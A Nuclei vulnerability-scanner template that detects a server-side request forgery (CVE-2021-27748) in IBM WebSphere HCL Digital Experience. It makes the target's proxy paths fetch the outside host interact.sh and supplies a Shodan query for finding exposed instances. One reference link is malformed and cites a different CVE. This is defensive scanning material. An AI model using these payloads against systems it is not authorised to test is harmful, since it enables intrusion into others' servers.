nuclei-templates/cves/2021/CVE-2021-27748.yaml

41 lines
1.1 KiB
YAML

id: CVE-2021-27748
info:
name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
author: pdteam
severity: high
description: |
IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
- hhttps://nvd.nist.gov/vuln/detail/CVE-2022-31268
classification:
cve-id: CVE-2021-27748
metadata:
verified: true
shodan-query: http.html:"IBM WebSphere Portal"
tags: cve,cve2021,hcl,ibm,ssrf,websphere
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "Interactsh Server"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/15